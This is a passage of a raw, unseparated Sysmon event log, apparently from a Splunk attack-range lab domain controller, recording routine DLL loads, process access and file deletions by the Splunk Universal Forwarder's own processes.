13:03:50.109{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B6FA254D2B15CF5E8A68646AE970AA4D,SHA256=6CAF83A4811BA3EB49FD225559519A8F6C532EA172535FE84BCD48A95D5DC4D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098824Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:50.015{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=851328231F8132ABA9E3886311001F20,SHA256=92E5CDB1DEEB8B695C59C5C1690EEF85D1B0732CCFA6476772B84A17E410A8BD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098823Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:50.015{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76A6DE1F0EFA358ED3ED2CD62A6583E7,SHA256=2634E640C573F0B6E0C6BB9C180B5F5F6D844AA9CA50F30730A830157298CE17,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000098886Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.406{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 
10341000x800000000000000098885Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.406{326FD73D-C0B7-6294-340B-000000005502}66086868C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098884Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.390{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000098883Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.390{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 
734700x800000000000000098882Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.249{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x800000000000000098881Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.249{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000098880Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.249{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000098879Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.249{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x800000000000000098878Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.249{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000098877Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.249{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x800000000000000098876Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.249{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x800000000000000098875Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.249{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x800000000000000098874Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000098873Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 
734700x800000000000000098872Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000098871Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000098870Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000098869Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000098868Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000098867Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000098866Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft 
CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098865Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000098864Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000098863Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 
734700x800000000000000098862Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x800000000000000098861Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000098860Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000098859Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared 
LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000098858Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000098857Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000098856Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000098855Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000098854Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000098853Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000098852Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft 
Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000098851Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000098850Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000098849Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5,IMPHASH=0D8FF9DE2DA5C07D680347B1A098E759trueMicrosoft WindowsValid 
734700x800000000000000098848Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000098847Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 10341000x800000000000000098846Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098845Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® 
